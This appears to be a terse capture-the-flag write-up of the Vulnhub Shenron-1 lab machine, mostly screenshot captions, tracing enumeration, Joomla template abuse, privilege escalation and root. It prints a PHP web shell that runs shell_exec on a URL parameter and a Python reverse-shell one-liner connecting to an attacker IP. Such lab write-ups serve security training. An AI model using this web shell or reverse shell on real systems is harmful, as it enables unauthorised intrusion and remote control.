Vulnhub Shenron-1 write-up

Open Ports
Service version detection
dirb output showing joomla running on port 80
gobuster output
test directory showing password file.
password page.
Credentials in page-source
Extension — Templates — Templates
Creating a php file
new php file my_shell.php

<?php echo “This will execute command.” ?>
<?php echo shell_exec($_GET[‘cmd’]); ?>

php code to get RCE
my_shell.php in action
Able to execute command.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker-ip",attacker-port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Reverse shell on shenron
jenny username and password
login with jenny user
ssh as user jenny
sudo -l output
SSH as user shenron
local.txt
LeanPEAS.sh to help
shenron password
sudo -l for user shenron
gtfobins apt privilege escalation
root on shenron-1

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store